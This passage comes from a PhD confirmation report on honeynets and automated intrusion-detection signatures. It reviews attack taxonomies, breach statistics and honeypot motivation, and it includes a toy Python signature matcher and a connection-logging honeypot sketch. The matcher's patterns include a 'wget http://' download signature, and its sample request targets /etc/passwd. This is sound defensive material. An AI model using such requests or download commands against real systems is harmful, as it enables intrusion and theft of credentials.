Ph.D. Confirmation Report
“Implement Novel Techniques for Intrusion Detection in Honeynets, for Automated IDS Signature Engineering”
Fahim Abbasi
Supervisor: Prof. Richard Harris
School of Engineering & Advanced Technology (SEAT)
Massey University
March 16, 2010
© Copyright by Fahim Abbasi 2010
All Rights Reserved

Table of Contents

CHAPTER 1: INTRODUCTION
  1.1. INTRODUCTION
  1.2. DEFINITIONS
    1.2.1. INFORMATION SECURITY
    1.2.2. COMPUTER SECURITY
    1.2.3. NETWORK SECURITY
    1.2.4. SECURITY STANDARDS AND DOCUMENTS
  1.3. BLACK HATS
  1.4. WHITE HATS
  1.5. ATTACKS AND ATTACK CLASSIFICATION
    1.5.1. ACTIVE ATTACKS
    1.5.2. PASSIVE ATTACKS
  1.6. TAXONOMY OF ATTACKS
CHAPTER 2: PROBLEM STATEMENT
  2. SECURITY PROBLEM
  2.1. CURRENT SCENARIO
  2.2. COST
  2.3. WHAT PEOPLE SAY ABOUT SECURITY
  2.4. NEEDS
CHAPTER 3: MOTIVATION AND RESEARCH CHALLENGES
  3.1. MOTIVATION
  3.2. OBJECTS THAT DEMAND SECURITY
  3.3. WHO IS TO BLAME?
  3.4. A FEW DOCUMENTED ATTACKS
  3.5. MOVING TOWARDS A SOLUTION
  3.6. HONEYPOTS AND HONEYNETS
    3.6.1. WHO. WHAT. WHERE, WHY AND HOW?
    3.6.2. HONEYPOTS
      3.6.2.1. MOTIVATION AND CONCEPT
      3.6.2.2. CLASSIC EXAMPLES
      3.6.2.3. DISCUSSING EXPLOITS
      3.6.2.4. EXAMPLE: LEAVES WORM
      3.6.2.5. EXAMPLE: CODE RED II WORM
      3.6.2.6. EXAMPLE: SOLARIS DTSCD EXPLOIT
    3.6.3. HONEYNETS
      3.6.3.1. DATA CONTROL
      3.6.3.2. DATA CAPTURE
      3.6.3.3. DATA COLLECTION
      3.6.3.4. HONEYNET ARCHITECTURES
        3.6.3.4.1. GENERATION I ARCHITECTURE
        3.6.3.4.2. GENERATION II AND III ARCHITECTURE:
      3.6.3.5. VIRTUAL HONEYNET
  3.7. RESEARCH CHALLENGE # 1
    3.7.1. ARCHITECTURE AND DESIGN CONSIDERATIONS IN VIRTUAL HONEYNETS
    3.7.2. INTRODUCTION
  3.8. RESEARCH CHALLENGE # 2
    3.8.1. INTRUSION DETECTION
    3.8.2. INTRUSION DETECTION PROBLEM
    3.8.3. INTRUSION DETECTION SIGNATURES
    3.8.4. AUTOMATED SIGNATURE ENGINEERING
CHAPTER 4: OVERVIEW OF RELATED WORKS
  4.1. HONEYPOTS AS ATTACK DETECTION AND LEARNING TOOLS
  4.2. AUTOMATED SIGNATURE ENGINEERING USING HONEYPOTS
  4.3. ANOMALY DETECTION
  4.4. NETWORK BEHAVIOURAL ANALYSIS (NBA)
CHAPTER 5: RESEARCH QUESTIONS
CHAPTER 6: METHODOLOGY REVIEW
  6.1. PROPOSED SYSTEM FOR VIRTUAL HONEYNET ARCHITECTURE PROBLEM
    6.1.2. METHODOLOGY AND DISCUSSION
    6.1.3. UBUNTU AS HONEYPOT
    6.1.4. VMWARE AS VIRTUALIZATION SOFTWARE
    6.1.5. HONEYWALL ROO
    6.1.6. SEBEK AS DATA CAPTURE TOOL
  6.2. PROPOSED SYSTEM FOR AUTOMATED SIGNATURE ENGINEERING
    6.2.1. DISCUSSION
    6.2.2. METHODOLOGY
      6.2.2.1. ANALYSIS OF SYSTEM EVENTS
      6.2.2.2. ANALYSIS OF NETWORK EVENTS
      6.2.2.3. HASHING ALGORITHM FOR PAYLOAD HASHING
      6.2.2.4. CLUSTERING BY COMPRESSION
  6.3. RESULTS AND DISCUSSION
CHAPTER 7: RESULTS
  7.1. SUMMARY
  7.2. ATTACK STATISTICS
    7.2.1. ATTACKED PORTS AND SERVICES
    7.2.2. ATTACKER IP'S
    7.2.3. ATTACKER’S COUNTRY OF ORIGIN
  7.3. FORENSIC ANALYSIS
    7.3.1. FIRST HACK
    7.3.2. BRUTE FORCE AND BOTNETS
    7.3.3. MORE BOTNETS
    7.3.4. COORDINATED ATTACKS
    7.3.5. LOCAL PRIVILEGE ESCALATION ATTEMPT
    7.3.6. FORENSICS OF AN ENCRYPTED BOTNET
      7.3.6.3. FORENSICS OF A HACKER’S IRC SESSION
8. ACHIEVEMENTS
9. RESEARCH PLAN
REFERENCES:
APPENDIX - A
  SEBEK LOGS
  SSH LOGS

List of Figures

FIGURE 1: ATTACK CONSEQUENCES VS LIKELIHOOD [84]
FIGURE 2: INTRUDER KNOWLEDGE VS SOPHISTICATION OF ATTACK [42]
FIGURE 3: INCIDENTS REPORTED TILL 2003 [37, 43]
FIGURE 4: THREAT CATEGORIES OVER TIME BY PERCENT OF BREACHES [50]
FIGURE 5: GEN I HONEYNET ARCHITECTURE [12]
FIGURE 6: GENERATION III HONEYNET ARCHITECTURE [12]
FIGURE 7: PROPOSED VIRTUAL HONEYNET ARCHITECTURE
FIGURE 8: ROO LOGICAL DESIGN
FIGURE 9: BEHAVIOURAL PROFILE FOR W32-BAGLE-Q WORM [94]
FIGURE 10: CLUSTERING BY COMPRESSION AND HASHING
FIGURE 11: HONEYNET DATA GRAPHICAL VIEW (IP-PORT)
FIGURE 12: PROBED PORTS
FIGURE 14: PROBED PORTS (EXCLUDING SSH)
FIGURE 15: TOP 50 ATTACKS BY COUNTRY

List of Tables

TABLE 1: WHAT PEOPLE SAY ABOUT SECURITY?
TABLE 2: HONEYPOT: CLASSIC EXAMPLES
TABLE 3: HONEYPOT: DISCUSSING EXPLOITS
TABLE 4: HONEYPOT: LEAVES WORM
TABLE 5: HONEYPOT: CODE RED II WORM
TABLE 6: HONEYPOT: SOLARIS DTSCD EXPLOIT
TABLE 7: SSH PATCH FOR THE HONEYPOT
TABLE 8: SSH LOGS
TABLE 9: COMPARISON OF MD5 AND FUZZY HASHING
TABLE 10: PROPOSED HASHED TECHNIQUE
TABLE 11: OLD TECHNIQUE (NCD ONLY)
TABLE 12: FORENSICS: HACK
TABLE 13: FORENSICS: BRUTE FORCE AND BOTNETS
TABLE 14: FORENSICS: MORE BOTNETS
TABLE 15: FORENSICS: COORDINATED ATTACKS
TABLE 16: FORENSICS: LOCAL PRIVILEGE ESCALATION ATTEMPT
TABLE 17: FORENSICS OF ENCRYPTED BOTNET
TABLE 18: FORENSIC OF A HACKERS IRC SESSION

Chapter 1: Introduction

1.1. INTRODUCTION

The revolution in Information Technology has provided a flood of assets in the form of applications and services. Enterprises have built their entire business models on top of these assets. Networks have evolved from low-speed half-duplex links to full-duplex, multi-homed, self-convergent gigabit streams controlled by advanced protocols. The security of the applications and services accessible over these networks currently represents a major challenge to the IT industry. Each day, exploits, worms, viruses and buffer overflows severely threaten the IT infrastructure and associated business assets, along with mission-critical systems. By learning the tactics and techniques used by malicious black hats (crackers), we can secure our data assets and infrastructure. This demands learning from both system-wide and network-wide resources.

Security is not an out-of-the-box solution. It requires careful analysis of the environment at hand before a solution can be proposed. It is a layered process and demands a thorough understanding of the system and its constraints. No system is 100 percent secure; a system is only as secure as its weakest point [28]. Security designs based on eggshell security models have proven to be the most vulnerable. "This can be viewed as an 'eggshell' security model: hard outer shell, soft in the center." [29]. Therefore, security should be implemented in layers based on a defence-in-depth model [30] rather than an eggshell model.
This makes it considerably harder for an attacker to penetrate the whole system, since he may have gained access to only one part or component of it. It also gives system administrators enough time to address the problem by patching or reconfiguring their resources.

Each day we witness new vulnerabilities emerging in the software we use every day. When exploited, these vulnerabilities lead to the compromise of systems. Crackers write customized software to target these vulnerabilities; self-propagating software of this kind is called a worm. Worms spread over the Internet like an epidemic, propagating themselves and infecting systems at very high rates. They can soon consume millions of systems, taking full control of them and awaiting further instructions. Many such worms install special client software on their victims, by which they chain them to an existing network of zombies. The result is a highly distributed network of machines that, on receiving a single instruction from its owner, can cause all sorts of havoc. Examples include theft of data and information, such as credit card details, online bank accounts, and email and social networking credentials. This information is a valuable asset in the underground economy, where it is sold for considerable sums of money.

Available security tools, while providing a good set of static defences, cannot cope with the dynamic nature of the threats. Most network security tools, such as firewalls and Intrusion Detection Systems (IDS), are passive in nature. They operate on the rules and signatures available in their database. Anomaly detection is thus limited to the set of available rules. Any activity not covered by these rules goes unnoticed and undetected. To analyse the tools that attackers use to gain access, we need to set up a vulnerable environment that poses as a valid resource to any attacker but is heavily logged.
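The limitation of rule-based detection described above can be illustrated with a minimal sketch. It assumes a toy signature database of byte patterns; the signature names, the patterns and the two sample payloads are hypothetical and are not taken from any real IDS rule set.

```python
from typing import List

# Hypothetical, highly simplified signature database: name -> byte pattern.
# A real IDS rule language is far richer; this only illustrates the principle.
SIGNATURES = {
    "example-directory-traversal": b"../..",
    "example-shell-download": b"wget http://",
}


def match_signatures(payload: bytes) -> List[str]:
    """Return the names of all signatures whose pattern occurs in the payload."""
    return [name for name, pattern in SIGNATURES.items() if pattern in payload]


# A payload covered by an existing signature raises an alert.
known = b"GET /../../etc/passwd HTTP/1.0"
# A payload for which no signature exists passes unnoticed.
novel = b"GET /index.php?id=%27%20OR%201=1 HTTP/1.0"

print(match_signatures(known))  # ['example-directory-traversal']
print(match_signatures(novel))  # []
```

The second payload produces no alert simply because no rule describes it, which is the blind spot that motivates collecting attack data in a heavily logged environment.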
Honeypots, by design, allow you to take the initiative by turning the tables on malicious black hats. A Honeypot system has no production value and no authorized activity. Thus any interaction with the Honeypot is most likely the result of malicious intent. Honeypots do not solve the security problem, but they provide data and knowledge that help system administrators enhance the overall security of their network. This knowledge can be used as input to any early warning system. Over the years, researchers have successfully isolated and identified worms and exploits using Honeypots placed in specialized architectures called Honeynets. These are then used for signature and rule development. Honeynets are capable of logging far more information than any other available security tool. They give insight into attacks and attackers: their skill level, their organization as groups or individuals, their motives and their tactics. Almost every aspect is logged and can be audited. This information will be analysed to develop a system for automated attack classification and signature generation.

We start the proposal by defining computer and network security terminology as background to the research work to be undertaken. This is followed by a brief description of attackers and attacks. In Chapter 2 we describe the security problem as the problem statement for this research, along with a brief background of its evolution. In Chapter 3 we describe the motivation for studying this domain and detail some of the problems that are associated with it. In Section 3.5 we propose a solution to the problem. In Section 3.6 we present the technology required to underpin the research and discuss current implementations and standards. In Section 3.7 we identify the first research challenge and discuss our experiences with the technology; here we find that current implementations lack some vital functionality, which our proposed technique provides.
In Section 3.8 we identify the second research challenge and discuss problems with current technology. In Chapter 4 we give an overview of existing related research activity. In Chapter 5 we provide a summary of the key research questions relevant to this proposal. In Chapter 6 we propose solutions to address the problem. In Chapter 7 we discuss the results obtained so far with the technology that we have used. Finally, we detail the progress we have made and the resources that have been developed so far. We also list publications and talks that have been delivered, together with an indication of proposed future directions and their associated milestones.

1.2. DEFINITIONS

1.2.1. Information Security

“Information security deals with those administrative policies and procedures for identifying, controlling, and protecting information from unauthorized manipulation. This protection encompasses how information is processed, distributed, stored, and destroyed” [31]

1.2.2. Computer Security

“A computer is secure if you can depend on it and its software to behave as you expect.” [32]

Computer security is essential [33]:
• “To prevent theft of or damage to the hardware
• To prevent theft of or damage to the information
• To prevent disruption of service”

1.2.3. Network Security

“Network security refers to all hardware and software functions, characteristics, features, operational procedures, accountability measures, access controls, and administrative and management policy required to provide an acceptable level of protection for hardware, software, and information in a network”. [31]

Network security is the art of securing and protecting network resources and assets, such as routers, servers, hosts and any device connected to the organization's network, from unauthorized and unwanted access that may lead to denial of service or to the modification, destruction or disclosure of the information held on these assets.
Network security falls under information security. It demands securing all information assets connected to a network as well as all information passing through the network.

1.2.4. Security Standards and Documents

The ITU-T Security Architecture for Open Systems Interconnection (OSI) document X.800 and RFC 2828 are the standard documents defining security services. X.800 divides the security services into 5 categories and 14 specific services, which can be summarized as:

“1. AUTHENTICATION: The assurance that the communicating entity is the one that it claims to be. It includes:
   • Peer Entity Authentication
   • Data Origin Authentication
2. ACCESS CONTROL: The prevention of unauthorized use of a resource (i.e., this service controls who can have access to a resource, under what conditions access can occur, and what those accessing the resource are allowed to do).
3. DATA CONFIDENTIALITY: The protection of data from unauthorized disclosure. It includes:
   • Connection Confidentiality
   • Connectionless Confidentiality
   • Selective-Field Confidentiality
   • Traffic Flow Confidentiality
4. DATA INTEGRITY: The assurance that data received are exactly as sent by an authorized entity (i.e., contain no modification, insertion, deletion, or replay). It includes:
   • Connection Integrity with Recovery
   • Connection Integrity without Recovery
   • Selective-Field Connection Integrity
   • Connectionless Integrity
   • Selective-Field Connectionless Integrity
5. NONREPUDIATION: Provides protection against denial by one of the entities involved in a communication of having participated in all or part of the communication. It includes:
   • Nonrepudiation, Origin
   • Nonrepudiation, Destination”
[8], [9], [1]

1.3. Black Hats

Black hats are highly skilled hackers or computer professionals who use their skill and knowledge to gain illegitimate access to computer and information systems. Their motivation is often social, economic, financial or political (hacktivist).
Often they are driven by zeal and curiosity to learn about computer systems and their secrets. Their goal is to exploit flaws or vulnerabilities in systems and use them for their own gain. The targets can be computer systems or humans (social engineering). Black hats use technology for identity theft, vandalism, credit card fraud, phishing, intellectual property theft (piracy) and many other types of sophisticated crime. In general terms, their activities include taking illegal control of remote computing resources via a network; gaining illegal access to software by cracking; collecting victims' information using spyware; scanning victims for exploits or enumeration using various scanners; writing self-replicating software, such as worms and viruses, that exploits all network-accessible systems; infecting victims with backdoors, rootkits and trojans for remote access; creating armies of such remotely controlled zombie systems, usually over IRC (botnets); and finally launching Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks to knock their targets offline or temporarily interrupt their service. These attackers range from 13-year-old novice users playing around with powerful hacking tools (script kiddies) to very sophisticated, elite system and network administrators (1337, a term used by the more sophisticated or elite hackers). Black hat hackers are the biggest threat, both internal and external, to the IT infrastructure of any organization, as they consistently challenge the security of applications and services. The name “black hat” refers to the colour of the hat that signals a character's intent in many Western movies and throughout the media, where outlaws and bad guys wear black; some computer geeks, however, simply find the colour black more appealing.

1.4. White Hats

White hats are ethically opposed to black hats.
White hat hackers use their skill and knowledge to secure and protect information and computer systems and to prevent attackers from accessing them illegally. They study black hat threats and devise mechanisms for identification, protection and prevention in the form of security policies and tools. They constantly check systems for vulnerabilities and exploits and correct them, and they have devised mechanisms for quickly updating and distributing their research and knowledge within the community to secure systems. White hat hackers are regarded as the white knights, the good guys and protectors. They are the defenders of the cyber frontier that is always under attack by the black hats.

Whether attacking or defending, hackers have played a major role in the evolution of today's technology and services. No system is 100% secure; thus a principal requirement is to strengthen the mechanisms used to study the black hats and defend our information assets.

1.5. Attacks and Attack Classification

Attacks are generally divided into two major categories:
1. Active Attacks
2. Passive Attacks

1.5.1. Active Attacks

Active attacks involve the attacker taking the offensive and directing malicious packets towards the victim in order to gain illegitimate access to the target machine, for example by exhaustively trying user and password combinations, as in brute-force attacks, or by exploiting remote and local vulnerabilities in services and applications, which are termed 'holes'. Other types of active attack include the masquerading attack, in which the attacker pretends to be a different entity; the replay attack, in which the attacker captures data and retransmits it to produce an unauthorized effect; and the modification attack, in which a message or file is modified by the attacker to achieve his malicious goals. Finally, when attackers try to knock a machine or resource offline to disrupt or delay a service, the attack is termed a denial of service (DoS) attack.
TCP and ICMP scanning is also a form of active attack, in which attackers exploit the way protocols are designed to respond, e.g. ping of death and SYN attacks. In all types of active attack the attacker transmits packets and so creates noise on the network, making it possible to detect and trace the attacker. It has been observed that skilled attackers usually attack their victims through proxy hosts that they have compromised earlier.

1.5.2. Passive Attacks

Passive attacks involve the attacker intercepting, collecting and monitoring transmissions sent by their victims. In the process, the attacker can eavesdrop on the victim's or target's communications. Passive attacks are very specialized attacks aimed at obtaining information that is being transmitted over secure and insecure channels. Since the attacker creates little or no noise on the network, it is very difficult to detect and identify them.

Passive attacks can be divided into two main types: the release of message content and traffic analysis.

Release of message content occurs when the content of a message falls into the hands of unauthorized users during transmission. The message can be as basic as a telephone conversation, an instant messenger chat, an email or a file.

Traffic analysis involves techniques used by attackers to retrieve the actual message from the intercepted encrypted messages of their victims. Encryption masks the contents of a message using mathematical formulas, making them unreadable. The original message can only be retrieved by the reverse process, called decryption. Such a cryptographic system is often based on a key or a password supplied by the user.
With traffic analysis the attacker can passively observe the patterns, trends, frequencies and lengths of messages in order to guess the key or retrieve the original message using various cryptanalysis techniques.

1.6. Taxonomy of attacks

Attack classification has always been an interesting area for security researchers. As a first step, Computer Incident Response Teams (CIRT) are required to classify the attacks at hand in their reports. This classification should be complete enough to give an in-depth view of the attack, the attacker, the target and the vulnerability exploited. Based on this classification, a mitigation plan is proposed. Many classification techniques have been proposed and adopted over the years, and later replaced by better ones. Based on the taxonomical work of Hansman et al. on the characterization and dimensioning of computer and network attacks, we can classify attacks as [37]:

Virus: a self-replicating program that propagates through some form of infected files
Worms: self-replicating programs that propagate through network services on computers or through email
Trojans: programs made to appear benign that serve some malicious purpose
Buffer overflows: a process gains control of, or crashes, another process by overflowing the other process's buffer
Denial of service attacks: attacks that prevent legitimate users from accessing or using a host or network
Network attacks: attacks focused on a network or the users on the network by manipulating network protocols, ranging from the data-link layer to the application layer
Physical attacks: attacks based on damaging physical components of a network or computer
Password attacks: attacks aimed at gaining a password
Information gathering attacks: attacks in which no physical or digital damage is carried out and no subversion occurs, but in which important information is gained by the attacker, possibly to be used in a further attack

Chapter 2: Problem Statement

2. SECURITY PROBLEM

2.1.
Current Scenario

Cyber crime has grown from vague reports of a victim's Yahoo or Hotmail account being hacked, or of a student changing his grades in the school database, into an entire underground industry with its own underground economy. Data, the raw material of this industry, is continually ripped out and harvested from globally distributed computers on an industrial scale. Malicious hackers and crackers act as the workforce and enablers of this industry. The industry earns revenue by selling its finished products (credit card details, authentication credentials, malware etc.) and services (customized malware and support for using it) to the general public. Everything is available in this market, from sophisticated customized malware scripts to a botnet of a hundred thousand nodes for hire. An entire industry of cyber criminals is continuously creating sophisticated malware that causes data breaches on network-connected computers all across the globe. Cyber crimes are easy to commit because policies are lacking or poorly implemented, both within states and across borders. The Internet crime industry is becoming highly lucrative. [38]

Malware is becoming more targeted, harder to detect and harder to remove. The security arena has witnessed a huge change in the threat landscape with the emergence of mobile devices and virtualization. Threats are now becoming mobile and pervasive over the cloud. VM sprawl is a major security concern, as VMs sprout like mushrooms from the ground, often misconfigured, to the dismay of the security engineer. All these developments weaken our grip on security, as the “Protect, Detect, and React paradigm” becomes harder to implement. [30]

Solera Networks have suggested a threat classification in their whitepaper [84]. Network threats are classified into four categories:

1. Threats coming in
2. Threats invited in
3. Threats already in
4. Threats going out
Network perimeter attacks, such as XSS and SQL injection, exploit vulnerabilities in public web portals to steal sensitive proprietary data, including sensitive user information, from backend databases. Such attacks account for the threats coming in. [84]

Social and technological attacks, ranging from emails that phish for information or lure users into drive-by downloads to online social interactions that innocently request personal or confidential information, account for the threats invited in. [84]

Threats already inside the network are claimed to be the most dangerous. They can arise from compromised systems or a renegade employee. If left unattended, the damage potential of these threats can quickly escalate. Being inside the network, an attacker can do nearly anything he desires. [84]

Threats going out, which lead to the exodus of sensitive data from a business enterprise, are critical. They can jeopardize confidential trade secrets, customer information such as social security numbers or credit card details, or classified national security information such as security plans for the head of state or parliamentarians. The attackers may also turn the business network to their own underground business needs, for example by running active spambots that push out bulk emails. [84]

Many organizations limit their security to perimeter security. An enterprise faces a constant threat from “things coming in” through perimeter penetration, also termed “walking through the front door”. This can be due to a technical vulnerability, such as SQL injection or a flaw in a browser, Flash or a media player, or to a social vulnerability. Once an attacker has managed to bring down that wall, very bad things can happen. Since traditional perimeter defences face the outside network, they are blind to the inside.
This can lead to the emergence of flows comprising traffic from bots, spambots and content distribution nodes, and to the leakage of other sensitive data from inside the network to the outside world. A survey conducted by the FBI and the Computer Security Institute reported that over 70 percent of the loss of confidential information comes from inside the organization. The security model must be layered, with internal assets secured, partitioned and monitored. [39] The need for a defence-in-depth strategy is felt now more than ever.

In the realm of security, response time is critical and saves money. An organization is prone to many threats, of which only a very small subset are known threats. The only way to respond to breaches quickly and effectively is root cause analysis. Surveillance is vital to security. We all expect a breach, but our existing tools do not help us when it happens. The situation is analogous to the real world, where security cameras are everywhere: they monitor everything but do not respond. It is up to the vigilance of the surveillance expert to identify an event of interest and report it. There is a dire need to look out for events of interest.

Cohen et al [40] established the security problem as: “Our society is so reliant on information that the loss or corruption of the United States’ information infrastructure would create a situation where the national banking system, electric power grid, transportation systems, food and water supplies, communication systems, medical systems, emergency services, and most businesses [could not] survive.” “Organizations that value their internal information realize that information is a strategic and competitive tool” [41].

2.2. Cost

The longer an attack goes on, the more expensive it tends to become. Direct costs include downtime, IT resources, and stolen data or IP. Indirect costs include follow-on incidents, impact to brand, and remediation for maximum scope.
The faster we can find the source and scope of a breach, the less expensive it will be.

Figure 1: Attack Consequences vs Likelihood [84]

2.3. What People Say About Security

Symantec predicts: In 2010, 'antivirus is not enough' (December 10th, 2009)
"...the industry is quickly realizing that traditional approaches to antivirus, both file signatures and heuristic/behavioural capabilities, are not enough to protect against today's threats."

Network Solutions Warns Merchants After Hack (Robert McMillan, July 7, 2009)
600,000 credit card numbers stolen from Ecommerce Hosting merchants

NY Times Website Infected With Fake Antivirus (September 15th, 2009)
"It's a fake page for a nonexistent antivirus app, which is actually malware...It's a multimillion dollar business"

Annual Threat Assessment of the US Intelligence Community for the Senate Select Committee on Intelligence (February 2nd, 2010)
"Sensitive information is stolen daily from both government and private sector networks... We often find persistent, unauthorized, and at times, unattributable presences on exploited networks... We cannot be certain that our cyberspace infrastructure will remain available..."

Hackers are defeating tough authentication, Gartner warns (January 18th, 2010)
"Cybercriminals are using increasingly sophisticated tactics to outmaneuver security systems so they can steal customers' log-in credentials and pillage their bank accounts, according to a Gartner analyst"

Google Hack Attack Was Ultra Sophisticated (January 14th, 2010)
"Hackers...used unprecedented tactics that combined encryption, stealth programming and an unknown hole in Internet Explorer"

More Victims Of Chinese Hacking Attacks Come Forward (January 14th, 2010)
"This attack involved very advanced methods, with several pieces of malware working in concert to give the attackers full control of the infected system, at the same time it attempts to disguise itself as a common connection to a secure website"

U.S. Army Website Hacked (January 12th, 2010)
"Every organization has these problems...They may not realize it, but they're just waiting for a smart kid to come along and copy off every critical piece of information they have"

Table 1: What People Say About Security

2.4. Needs

Lessons learned from history point towards the need to re-evaluate current techniques. The needs can be summarized as follows:

Need to stop and remediate events quickly.
Need to do more and find the root cause of breaches.
Need for better forensic analysis and tools.
Need for techniques to glean information from the data.
Need for consistent policies across borders.
Need for stronger passwords or keys.
Need to secure application level vulnerabilities.
Need for automation in the security industry.
Need for more dynamic security technology.
Need to get information out of systems intelligently: logging in depth, better log management, better log analysis and better management roles.
Need to know what to protect and how to protect it.
Need to know the threat you face; know your enemy.
Need to be vigilant and responsive.

Chapter 3: Motivation and Research Challenges

3.1. Motivation

Security is a collective effort and demands thorough planning. Unfortunately, in the past it was largely overlooked and not considered a real problem. The need to secure data and information assets was first felt publicly after the commercialization of the Internet in the late 1980s. Paula [41] has correlated this with the emergence of the first virus in 1988: “Therefore, in the fall of 1988 the world saw evidence of the true threats that existed to network security. The Internet Virus was launched at that time and all of the 60,000 computers on the Internet were crippled for two entire days.” A historical study [41] reveals that the first published document on security was the “Trusted Computer Security Evaluation Criteria”, a host hardening manual that ignored the network security aspects.
No real threats were felt at the time, as the early Internet was shared between very few organizations, mostly to conduct, collaborate on and share research. As Paula [41] states, before this more emphasis was laid on running, maintaining and expanding the ARPAnet: “People who used the ARPAnet were scholars and government employees who were at the time more concerned with discovery than with destruction.”

Over the years we have observed a sharp increase in the intricacy, sophistication and overall frequency of attacks. User-friendly hacking tools, which do not demand a great deal of understanding from their users, account for a large share of these attacks. Lipson (2002) has studied this trend and presented it graphically:

Figure 2: Intruder knowledge vs sophistication of attack [42]

3.2. Objects that demand security

Operating systems not designed with much security in mind (Win9x, WinNT, XP, Linux).
Applications not designed with security in mind (office applications, web browsers).
Services not designed with security in mind (ftp, telnet, http, r-services).
Misconfigured folder permissions that let ordinary system users access sensitive system files.
Misconfigured networks that expose disk shares and other information resources to the outside world with full permissions.

3.3. Who is to Blame?

Why is everything considered secure by default until it is exploited? Should we blame the coders? The architects and designers? What about users who keep weak or easily guessable passwords? Should we blame the human? Time has proven that security is a collective effort. We can only blame ourselves for not thinking about security while coding, designing, testing or implementing software and hardware. It was not until organizations had been robbed of their data that they realized the magnitude of the problem and started work on a solution.

3.4.
A Few Documented Attacks

Statistics from the Computer Emergency Response Team Coordination Center (CERT/CC) show a tremendous increase in the number of reported incidents since 1999 (CERT, 2003).

Figure 3: Incidents reported till 2003 [37, 43]

A few notable incidents are documented here:

FBI statistics state that up to five billion dollars is lost each year due to information theft through computer crimes.
285 million records were compromised in 2008.
In 2009, 10 million USD were stolen worldwide using ATM cards in less than 24 hours. These thefts were conducted by a well-organized band of bank robbers. [38]
“US-CERT is aware of public reports indicating a widespread infection of the Conficker/Downandup worm, which can infect a Microsoft Windows system from a thumb drive, a network share, or directly across a corporate network, if the network servers are not patched with the MS08-067 patch from Microsoft. Researchers have discovered a new variant of the Conficker Worm on April 9, 2009.” [49]
The Verizon report notes an increase in web-based and application hacks. [50]
The Verizon data breach report of 2009 reveals who was behind data breaches: 74% resulted from external sources, 20% were caused by insiders, 32% implicated business partners, and 39% involved multiple parties (+9%). [50]
The same report describes how breaches occurred: 67% were aided by significant errors, 64% resulted from hacking, 38% utilized malware, 22% involved privilege misuse (+7%), and 9% occurred via physical attacks. [50]
85% of organizations had a major network incident in the past 3 years or expect a major incident in the next 3 years. [50]

Figure 4: Threat categories over time by percent of breaches [50]

3.5. Moving Towards a Solution

Security tools by themselves cannot save us from the onslaught of malicious black hat crackers. These tools require intelligent use and configuration before they become effective.
Stephen Northcutt and Judy Novak put this in their book as follows: “Intrusion detection is not a specific tool but a capability, a blending of tools and techniques” [51]. Flawed assumptions about security tools lead to a false sense of security. For example, what use is antivirus software if it is not updated frequently? What use is a firewall if the user does not know how to configure it and relies on default policies every time? The same goes for IDS and IPS.

Networks are becoming more scalable and are evolving rapidly. It is a world of dynamic services and dynamic networks, attracting dynamic threats. The available static defences, such as AV systems, firewalls and IDS, are not sufficient. They involve too much manual input from humans and require hours of analysis before new rules and signatures can be produced; meanwhile the threat is running in the wild, infecting and claiming more and more resources.

Most network security tools, such as firewalls and Intrusion Detection Systems (IDS), are passive in nature. They operate on the rules and signatures available in their database. Detection is thus limited to this set of available rules; any activity that these rules do not describe goes undetected.

Research remains the most effective way to understand vulnerabilities, how they are identified and how they are exploited, along with the hacker tools used to exploit them and the tactics involved. By learning the tactics and techniques used by malicious black hats we can secure our IT assets and infrastructure.

Honeypots provide a means to study the techniques and tactics by which black hats gain illegitimate access to system resources, along with methods to analyse the tools they use. This is achieved by setting up a vulnerable environment that poses as a valid resource to any attacker, but is heavily logged.
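The idea of a resource that looks valid to an attacker but logs everything can be illustrated with a very small sketch. The Python below is not the Honeypot software used in this work; it is a much simpler, low-interaction stand-in written only for illustration. The function names, the record fields and the 4096-byte read limit are all assumptions. It accepts one TCP connection, records who connected and what was sent, and closes the connection without offering any real service.

```python
import socket
from datetime import datetime, timezone


def describe_connection(peer_ip, peer_port, payload):
    """Build one log record for a single inbound connection (hypothetical format)."""
    return {
        "time": datetime.now(timezone.utc).isoformat(),
        "src_ip": peer_ip,
        "src_port": peer_port,
        "bytes": len(payload),
        "payload_hex": payload.hex(),  # hex keeps binary exploit data loggable
    }


def serve_once(listener, log):
    """Accept one connection, record what the client sent, then close it."""
    conn, (peer_ip, peer_port) = listener.accept()
    with conn:
        conn.settimeout(2.0)
        try:
            payload = conn.recv(4096)  # assumed limit: first 4096 bytes only
        except socket.timeout:
            payload = b""  # client connected but sent nothing in time
    log.append(describe_connection(peer_ip, peer_port, payload))


def run(host="0.0.0.0", port=2323, max_events=10):
    """Listen on an otherwise unused port; every connection is suspicious."""
    log = []
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as listener:
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((host, port))
        listener.listen(5)
        while len(log) < max_events:
            serve_once(listener, log)
    return log
```

Because the listener has no production purpose, every record returned by `run()` is a candidate event of interest. A real deployment would also forward the records to a remote collector rather than keep them in memory.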
The ideal solution to the security challenges of today is a comprehensive vulnerability management program that detects all sorts of intrusions, threats and exploits, analyses them, correlates the events that occurred and generates automated, proactive responses to the newly identified weaknesses. This thesis aims to realise part of this idea. Our research will focus on intrusion detection and on the creation of an automated signature engineering system as an active response for mitigation. We have divided the research into two main phases:

1. Deployment of Honeypot sensors in Honeynets to collect real-time data on intrusions and attacks.
2. Automated analysis of attack data to identify, classify and cluster attacks to serve as input for signature generation.

3.6. Honeypots and Honeynets

3.6.1. Who, what, where, why and how?

The first step towards achieving our research goals involved setting up Honeypot sensor nodes. These sensors will aid us in understanding who the attackers are. What methods and tools do they use to attack? Where do they get their knowledge and tools from? Why do they attack us? How do they organize and gain access to so many victim machines simultaneously?

3.6.2. Honeypots

A Honeypot is generally defined as a network security resource whose value lies in its being scanned, attacked, compromised, controlled and misused by an attacker to achieve his malicious goals. Lance Spitzner [1] defines a Honeypot as “an information system resource whose value lies in unauthorized or illicit use of that resource”.

3.6.2.1. Motivation and Concept

Most network security tools, for example firewalls and IDS, are passive in nature. They operate on the rules and signatures available in their database, which is why detection is limited to the set of available rules. Any activity that these rules do not describe goes under the radar and is thus undetected.
